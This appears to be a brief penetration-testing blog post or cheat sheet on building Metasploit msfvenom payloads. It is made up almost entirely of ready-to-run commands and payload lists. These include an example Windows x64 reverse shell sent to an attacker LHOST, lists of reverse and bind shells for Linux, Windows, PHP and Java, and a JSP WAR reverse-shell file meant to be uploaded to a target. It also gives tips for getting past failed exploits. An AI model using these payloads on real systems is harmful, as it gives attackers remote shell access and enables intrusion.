Metasploit msfvenom Payloads


The payloads below are commonly used and can be used from within Metasploit. They can also be used outside of metasploit by running msfvenom from the command line as follows:

msfvenom -p [payload name] -a [x64 or x86] –platform [windows/linux] -e [encryptor] -f [optional output format] -o [optional output file name] EXITFUNC=thread LHOST=[listening/ attacker host] LPORT=[listening port]


For example, generating a basic shellcode payload for a Windows x64 system would look something like this:

msfvenom -p windows/x64/shell_reverse_tcp -a x64 –platform windows -e x64/tor -f raw -o meterpreterx64.bin EXITFUNC=thread LHOST=10.10.10.10 LPORT=4444


If your exploit fails while using any one of the meterpreter payloads re-try the exploit using a non meterpreter payload such as ‘windows/shell/reverse_tcp’

Too many times I assumed an exploit was not working only to find that the host I was trying to exploit just didn’t like my meterpreter payload…


Platform    
Payload Name
Linux
  • payload/linux/x86/meterpreter_reverse_tcp
  • payload/linux/x86/shell/reverse_tcp                                               
Windows
  • Windows/meterpreter/reverse_https
  • windows/shell/reverse_tcp  
  • windows/x64/shell_reverse_tcp

 

Generic
  • generic/shell_reverse_tcp  

 

PHP
  • php/reverse_php
  • php/meterpreter_reverse_tcp php/meterpreter/reverse_tcp
  • php/bind_php
  • php/exec  

 

Java
  • java/jsp_shell_reverse_tcp

            -Java War Shell-

            msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f   

            war > iwonthe.war

            File can be uploaded wherever WAR files are accepted

 

 

 

 

   

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *